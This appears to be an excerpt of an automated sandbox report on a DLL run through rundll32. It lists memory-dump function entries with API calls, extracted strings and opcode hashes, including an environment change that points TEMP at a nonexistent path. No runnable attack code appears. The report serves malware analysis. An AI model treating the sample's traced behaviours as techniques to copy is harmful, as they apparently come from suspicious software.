                      • Opcode ID: b75cb29af7e99e2058f060401ee0757a302485212b53d6a2c557ba5d9d037639
                      • Instruction ID: fcb362689cff18ece5a650470aa549c5e8683f0d3c968ab991c934ba6c0fc390
                      • Opcode Fuzzy Hash: b75cb29af7e99e2058f060401ee0757a302485212b53d6a2c557ba5d9d037639
                      • Instruction Fuzzy Hash: 3B4199B9D01609DFCB04CFA8D590AEEBBF5FF48310F204269E915A7390D7346A45CBA5
                      APIs
                      • __EH_prolog3.LIBCMT ref: 7F3D022B
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F3D0236
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 7F3D02A4
                        • Part of subcall function 7F3D0387: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7F3D039F
                      • std::locale::_Setgloballocale.LIBCPMT ref: 7F3D0251
                      • _Yarn.LIBCPMT ref: 7F3D0267
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                      • String ID:
                      • API String ID: 1088826258-0
                      • Opcode ID: b77d6430e1cfc3b2c3164ba6e19add6c59c2b96bc389372ebce87313f57a80b6
                      • Instruction ID: 2b65957f623653be2daeda4e23ea54a368bfc52fc76c07be5093d15b174a1aae
                      • Opcode Fuzzy Hash: b77d6430e1cfc3b2c3164ba6e19add6c59c2b96bc389372ebce87313f57a80b6
                      • Instruction Fuzzy Hash: 840171BBA012159BDB05DF70C8506BD7BB6FFC4760B284009E8125B380CF35AE06DB95
                      APIs
                      • lstrlenA.KERNEL32(?,00000000,?,00000000,?,FFFF7D9A,FFFFFFFF,C4A18EEC,00019EE8,0000005A,?,783137D2,000B623B), ref: 7F362FBF
                      • IsValidCodePage.KERNEL32(?,00000000,?,00000000,?,FFFF7D9A,FFFFFFFF,C4A18EEC,00019EE8,0000005A,?,783137D2,000B623B), ref: 7F363307
                      • GetLastError.KERNEL32(00000000,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F3638A9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CodeErrorLastPageValidlstrlen
                      • String ID: 4A$APPLY_ALL_SHIMS
                      • API String ID: 608377448-2411809814
                      • Opcode ID: eaba4dc035b382dbe9255ed486484207f67f10d1c2bcc88cd7afe4ace6ba6371
                      • Instruction ID: 2cc40be3939287b0de9eff0cc1f127bc39565e676d6517b3c025b1f66af01adf
                      • Opcode Fuzzy Hash: eaba4dc035b382dbe9255ed486484207f67f10d1c2bcc88cd7afe4ace6ba6371
                      • Instruction Fuzzy Hash: 70E19E7A901224DBDB14CF6AC9907ADBFF2FF48321F28815AE409A7356D3349991CF64
                      APIs
                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\NonExistentPath), ref: 6D091731
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentVariable
                      • String ID: C:\NonExistentPath$TEMP$}
                      • API String ID: 1431749950-3776891069
                      • Opcode ID: 5deeae651428f5ef84c311c31dbc21a3a76c8ed0c6219acb76b9c5ea7507cde1
                      • Instruction ID: 68fb1c8be6a95aad9b2d75e9baf98903236032424fc50f2cf70300448e738551
                      • Opcode Fuzzy Hash: 5deeae651428f5ef84c311c31dbc21a3a76c8ed0c6219acb76b9c5ea7507cde1
                      • Instruction Fuzzy Hash: D0611278D0A399CEDF14CFA8C4807ADBFB5BF5A304F10919AD858A7391E3710A85CB56
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a139e0eda364d5a09ed5dd1e21d9081fd7d35cdd7b0eaa96061cd7a0d31660d
                      • Instruction ID: 0e4dfe79a95172b7be84d02eb2fb5b4603fac8bdef61c2b6b0be27f53532a5c5
                      • Opcode Fuzzy Hash: 8a139e0eda364d5a09ed5dd1e21d9081fd7d35cdd7b0eaa96061cd7a0d31660d
                      • Instruction Fuzzy Hash: 40C19E79D04628CFDB14CF6AC8907AEBFF1BB49316F24819ED449A7249D7349A81CF20
                      APIs
                      • lstrlenA.KERNEL32(?,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F363F81
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: Directoryexpansion$FailedtocreateJson
                      • API String ID: 1659193697-3689221051
                      • Opcode ID: fb415fb47915a147fae232b1b190a0e76bf69ade9eb24d82d5a39f1752d652c8
                      • Instruction ID: d60124e6c23ce1b50f7a55faf2da592728ddfb845b888cfc39415e63ba136227
                      • Opcode Fuzzy Hash: fb415fb47915a147fae232b1b190a0e76bf69ade9eb24d82d5a39f1752d652c8
                      • Instruction Fuzzy Hash: DF51707A915224DBDB14CF66C8807ADBFF5FF98320F28819AE408A7345D7749994CF14
                      APIs
                      • lstrlenA.KERNEL32(?,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F363F81
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,4D4C9FA9,00000000,A24EDEF3,000980B9,?,?,?,?), ref: 7F36411A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: Directoryexpansion$FailedtocreateJson
                      • API String ID: 1659193697-3689221051
                      • Opcode ID: 861d28cd2b254f28290d09c27f2b800c822bcc0aa1fbbd75c447150b98bae36c
                      • Instruction ID: 5131917abf405d3e0a76e31a1848bda786825801822fb079b7287f9b86b2343e
                      • Opcode Fuzzy Hash: 861d28cd2b254f28290d09c27f2b800c822bcc0aa1fbbd75c447150b98bae36c
                      • Instruction Fuzzy Hash: E1516C79D05228DBDB08CF95C8906ADBFF6BF98324F28819AE409B7345D7355A90CF24
                      APIs
                      • lstrlenA.KERNEL32(?,?,C7D4768E,000994B2,?,43A52638,550022EB,000B5AF7,?,?,?,?), ref: 7F363F81
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,4D4C9FA9,00000000,A24EDEF3,000980B9,?,?,?,?), ref: 7F36411A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: Directoryexpansion$FailedtocreateJson
                      • API String ID: 1659193697-3689221051
                      • Opcode ID: 9c2ebe81e3b1c3eea27a5e866f0a445c659344ae6a2c37fbbd0c8acb4839d000
                      • Instruction ID: d7f0f060b4868760b603ec59b9c24207ecfcc2e869a7032f2857f890d6f408d4
                      • Opcode Fuzzy Hash: 9c2ebe81e3b1c3eea27a5e866f0a445c659344ae6a2c37fbbd0c8acb4839d000
                      • Instruction Fuzzy Hash: BB112C79C05228CBDB18CF65C45069CBBFABB48324F28829ED414BB295D7755A94CF10
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv
                      • String ID: +$-
                      • API String ID: 3732870572-2137968064
                      • Opcode ID: 681c65016d24c7b7105fca5b5203595cbdca8aa8ea371b8417ad98ffbdcbfc7b
                      • Instruction ID: fbd55d47458dc26d5a85cd72cf3d77317f4ba7370ee20ab2e9b43390ed60aca6
                      • Opcode Fuzzy Hash: 681c65016d24c7b7105fca5b5203595cbdca8aa8ea371b8417ad98ffbdcbfc7b
                      • Instruction Fuzzy Hash: 0EA1B373E02359EFCB05CE78C8506EE7BB5EF56624F048659F8A6AF284D234A506CB50
                      APIs
                      • GetFocus.USER32 ref: 7F365AEC
                      • GetSystemMenu.USER32(00000000,00000001), ref: 7F365B19
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: FocusMenuSystem
                      • String ID: 4A
                      • API String ID: 4096349137-1298712752
                      • Opcode ID: 0eed4be27cc5d86c890d2c6ff64c488937ec0883f24037db492341f159e7c344
                      • Instruction ID: b41dc1ae2063b1844bc35050b50b6b95e1519f3db6a7bb5bea3f5436d163230d
                      • Opcode Fuzzy Hash: 0eed4be27cc5d86c890d2c6ff64c488937ec0883f24037db492341f159e7c344
                      • Instruction Fuzzy Hash: 51A192B9904268DBDB50CF66C8407BEBBF5FF48315F1880AED44AA7249D3349990CF25
                      APIs
                      • GetLargePageMinimum.KERNEL32 ref: 6D086721
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D050000, based on PE: true
                      • Associated: 0000000E.00000002.3112985616.000000006D050000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113314542.000000006D0B7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113414397.000000006D0CF000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113626125.000000006D422000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113699130.000000006D536000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 0000000E.00000002.3113756208.000000006D537000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_6d050000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: LargeMinimumPage
                      • String ID: 3$T
                      • API String ID: 2015960775-1149433488
                      • Opcode ID: 349d95263e385fd0a1fce2f75362b56846f13d05461ee2326b0a010cd569e047
                      • Instruction ID: 0942de21cce209909727e4db2a0f5b287d4a8d37f765589630d609ced1148830
                      • Opcode Fuzzy Hash: 349d95263e385fd0a1fce2f75362b56846f13d05461ee2326b0a010cd569e047
                      • Instruction Fuzzy Hash: 9861EF78916298CEDF14CFA9C59079DBFB9BF5A310F10809AD848A7351E3740A45CB96
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 7F347AF3
                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F347BBF
                        • Part of subcall function 7F3D0322: _Yarn.LIBCPMT ref: 7F3D0341
                        • Part of subcall function 7F3D0322: _Yarn.LIBCPMT ref: 7F3D0365
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                      • String ID: bad locale name
                      • API String ID: 1908188788-1405518554
                      • Opcode ID: 4adaf1e430731bae81e4079aeb41c96c6f198f70908830cff4ed8ba3f39f1c2e
                      • Instruction ID: f9c48051be3a0f43705c04a6bb9d1e983eb12cf703174738dd1e5e2961994136
                      • Opcode Fuzzy Hash: 4adaf1e430731bae81e4079aeb41c96c6f198f70908830cff4ed8ba3f39f1c2e
                      • Instruction Fuzzy Hash: D841E6B4905289DFDB01CFA8C954BAEFBF1BF49304F248199D415AB381C77A9A01CBA5